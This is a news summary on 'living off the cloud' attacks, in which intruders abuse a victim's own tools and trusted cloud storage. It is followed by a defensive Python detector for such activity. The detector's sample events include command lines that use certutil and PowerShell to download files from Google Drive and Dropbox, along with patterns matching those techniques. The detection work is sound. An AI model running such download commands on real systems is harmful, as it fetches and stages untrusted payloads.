"'Living Off the Cloud': Hackers Modernize an Old-School Tactic"

As governments and other players increasingly rely on the cloud, malicious actors are following suit, reintroducing "living off the cloud" attacks into their operations. "Living off the land" (LotL) schemes involve hackers gaining access to a victim's networks via phishing or other methods, then using the victim's own tools and services for malicious purposes. According to cybersecurity firm Darktrace, these attacks are particularly subtle and date back to at least 2013. A more recent subset of this is living off the cloud, which makes use of the victim's cloud services. The attack's name is derived from the physical-world lifestyle of living off the land, in which practitioners rely on food and other resources harvested from the surrounding nature. Hackers using tools found in the victim's environment are the cybersecurity equivalent.

According to Johannes Ullrich, dean of research at the SANS Technology Institute, malicious actors could, for example, use the Windows Certutil tool, designed to allow users to download files from the Internet, to download malware. Hackers can stay under the radar by using the tool as it was intended. The method is often used for espionage or to extort money by threatening to leak data. It may be easier for victims to detect malicious code deployed on their networks than it is to detect when a legitimate tool is used for malicious purposes. Another example would be a malicious party directing a victim's backup solution to copy data to a hacker-owned storage location.

Attackers may also use cloud services to host malware and send phishing links from trusted web domains. Palo Alto Networks, for example, recently revealed that the criminal group behind the SolarWinds attack was hosting malware on popular cloud storage services such as Google Drive and Dropbox. The hackers then sent phishing emails with URLs that, if clicked, downloaded malware from the cloud hosting onto the victims' systems. This is a new tactic for this actor, and it is difficult to detect because of the pervasiveness of these services and the trust placed in them by millions of customers worldwide. This article continues to discuss LotL attacks and the cloud-related subset of such attacks.
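The detection problem the summary raises (a built-in tool such as Certutil used as intended, but to pull a payload from a trusted file-sharing domain) can be approached from process-creation telemetry. The following Python is an added example, not from the GovTech article or any named vendor: the events are constructed, and the command-line patterns for Certutil and PowerShell are assumed indicators, not a complete ruleset.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events (image name, full command line), shaped
# like a Sysmon Event ID 1 / EDR feed. These lines are made up for the example.
SAMPLE_EVENTS = [
    ("certutil.exe",
     "certutil.exe -urlcache -split -f https://drive.google.com/uc?id=EXAMPLE_ID update.tmp"),
    ("certutil.exe", "certutil.exe -verify -urlfetch vendor-signed.cer"),
    ("certutil.exe", "certutil.exe -hashfile C:\\Reports\\q3.pdf SHA256"),
    ("powershell.exe",
     "powershell.exe -nop -c \"Invoke-WebRequest https://www.dropbox.com/s/EXAMPLE/x.bin -OutFile x.bin\""),
    ("msedge.exe", "msedge.exe https://intranet.example.local/"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# File-sharing services the article names as abused for malware hosting.
CLOUD_HOSTS = ("drive.google.com", "dropbox.com")
# Built-in tools whose download capability is the LotL concern, each with an
# assumed command-line pattern indicating a fetch (illustrative, not exhaustive).
DOWNLOADER_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache", re.I),
    "powershell.exe": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I),
}

def on_cloud_host(host):
    """True if host is one of the listed services or a subdomain of one."""
    return any(host == h or host.endswith("." + h) for h in CLOUD_HOSTS)

def classify(image, cmdline):
    """Return reasons if the event looks like download abuse of a built-in tool,
    else an empty list. Ordinary certutil use (hashing a file, verifying a local
    certificate) carries no URL on the command line and is not flagged."""
    urls = URL_RE.findall(cmdline)
    pattern = DOWNLOADER_PATTERNS.get(image.lower())
    if not urls or pattern is None or not pattern.search(cmdline):
        return []
    host = (urlparse(urls[0]).hostname or "").lower()
    reasons = [f"{image.lower()} fetching {urls[0]}"]
    if on_cloud_host(host):
        reasons.append(f"payload host {host} is a consumer file-sharing service")
    return reasons

def detect(events):
    """Run classify over a batch and return (image, reasons) for each hit."""
    return [(img, classify(img, cmd)) for img, cmd in events if classify(img, cmd)]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

Only two of the five constructed events are flagged: the two legitimate Certutil invocations and the browser visit to an internal site produce no alert, which is the point of keying on the download pattern plus a URL rather than on the tool name alone.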

GovTech reports "'Living Off the Cloud': Hackers Modernize an Old-School Tactic"
